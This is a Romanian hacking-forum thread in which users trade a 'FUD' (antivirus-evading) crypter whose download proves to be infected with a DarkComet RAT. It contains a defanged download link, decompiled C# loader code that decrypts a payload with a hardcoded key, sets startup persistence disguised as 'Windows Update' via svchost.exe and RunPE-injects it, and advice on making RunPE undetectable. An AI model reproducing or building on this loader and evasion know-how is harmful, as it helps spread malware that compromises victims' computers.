Netscape Posted January 2, 2014 Report Posted January 2, 2014 (edited) Brick Crypter (obfuscate)Nu e cine stie ce la optiuni, dar e FUD.Download: hxxp://up.ht/KmrYlOScan RAT (DarkComet): Total Results: 0/35L-am luat de pe un forum.#Usrfisierul de mai sus este infectat, descarcati doar pt analizanu e al tau, netscapedev.zapto.org Edited January 2, 2014 by Usr6 Quote
Netscape Posted January 2, 2014 Author Report Posted January 2, 2014 @askwrite. Am scris ca l-am luat de pe un forum. Mie mi se deschide, poate ai tu virus de altundeva. Quote
gh551 Posted January 2, 2014 Report Posted January 2, 2014 Scan RAT (DarkComet): Total Results: 0/35Arata colosal. Daca era macar 0/36 il foloseam sigur. Quote
Netscape Posted January 2, 2014 Author Report Posted January 2, 2014 https://www.virustotal.com/en/file/e18d720c7a22fc13f35ca06e5b8c91bba63db4da8b82d5b42b2f677a89248011/analysis/ Quote
Byte-ul Posted January 2, 2014 Report Posted January 2, 2014 Asta a pus serveru in loc de crypter =)Chiar si assembly name e "server-cryptat" ))))https://www.virustotal.com/en/file/2ced2708be3bfe3974f089edc6e940c10ff5310da440ce7e030f670259ede54b/analysis/1388680162/ Quote
gh551 Posted January 2, 2014 Report Posted January 2, 2014 Ce ghinion. Era si versiunea din 2014 Quote
Netscape Posted January 2, 2014 Author Report Posted January 2, 2014 Pentru ce ma, l-am luat de pe HF sectiunea VIP. Nu e vina mea, mie mi s-a deschis. Hai salut. Quote
Byte-ul Posted January 2, 2014 Report Posted January 2, 2014 Pentru ce ma, l-am luat de pe HF sectiunea VIP. Nu e vina mea, mie mi s-a deschis. Hai salut.Cica lui i s-a deschis )Cum sa ti se deschida mai copile cand codu e asa:m0001 fiind chestia care descripteazam0004 e add to startupsi m0005 e runpe.inject =)In fine, merci de RunPE, mai rar gasesti unu FUD. Quote
robyyxx Posted January 2, 2014 Report Posted January 2, 2014 Merci frate merge crypteru de rupe:eu la decompilare am obtinut asta:using System.Text;namespace _5cku0up7zblm4m6s{ internal class Program { private static void Main(string[] args) { _icohsk6upujjb2br icohsk6upujjb2br = new _icohsk6upujjb2br(); _c2kysru1o76t79dj c2kysru1o76t79dj = new _c2kysru1o76t79dj(); _dq1y0opsmshbq9uq dq1y0opsmshbq9uq = new _dq1y0opsmshbq9uq(); _11njsybv4w2kunao obj = new _11njsybv4w2kunao(); byte[] bytes = c2kysru1o76t79dj._hp9vnnz21nl1hn26(); icohsk6upujjb2br._5bsrntzkh6p9uyd8(ref bytes, Encoding.ASCII.GetBytes("WPBmyKVH2XpVoS5TMiAtW4hv6arHDB7S")); obj._cx2tvinuqdmp9zhr("Windows Update (x86)", "svchost.exe"); dq1y0opsmshbq9uq._7t5bwu0kos4h36yr(bytes); } }}+ restu de functii si alte coduri, dau pe privat la cine vrea.Oricum trebuie sa te felicit pentru efortul depus pentru al face FUD. Quote
yes1234 Posted February 7, 2014 Report Posted February 7, 2014 (edited) Cica lui i s-a deschis )Cum sa ti se deschida mai copile cand codu e asa:m0001 fiind chestia care descripteazam0004 e add to startupsi m0005 e runpe.inject =)In fine, merci de RunPE, mai rar gasesti unu FUD.Poti face foarte usor un RunPE FUD... Faci un DLL cu RunPE-ul in el, il bagi cryptat in output, il decryptezi la pornire si ii dai invoke la metoda.Si-mi place cat s-a chinuit el sa se uite prin codul RunPE-ul-ui, "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", oare ce face cu astia care au Windows-ul in alta partitie, ca mine:) Edited February 7, 2014 by yes1234 Quote
yoyois Posted February 7, 2014 Report Posted February 7, 2014 (edited) Bai crypterul asta l-am facut eu https://rstforums.com/forum/63286-crypter-brick-crypter-new-version-4-37-a.rstAnyway e "obfuscate" cu RedGate SmartAssembly. (daca vreti am si sursa)Care jegos se foloseste de el sa isi raspandeasca virusii? Edited February 7, 2014 by yoyois Quote